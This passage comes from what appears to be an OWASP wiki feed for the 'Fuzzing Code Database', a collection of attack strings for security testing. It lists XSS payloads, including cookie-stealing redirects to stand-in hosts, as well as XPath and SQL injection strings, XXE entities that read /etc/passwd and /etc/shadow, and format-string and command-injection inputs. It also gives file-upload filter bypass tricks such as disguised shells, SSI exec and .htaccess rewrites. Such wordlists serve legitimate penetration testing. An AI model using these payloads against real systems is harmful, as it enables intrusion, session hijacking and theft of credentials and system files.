&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80066</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80066"/>
				<updated>2010-03-17T20:45:05Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* File Upload Filter Bypass   (Update: 17 March 2009 - notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&amp;lt;pre&amp;gt;{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
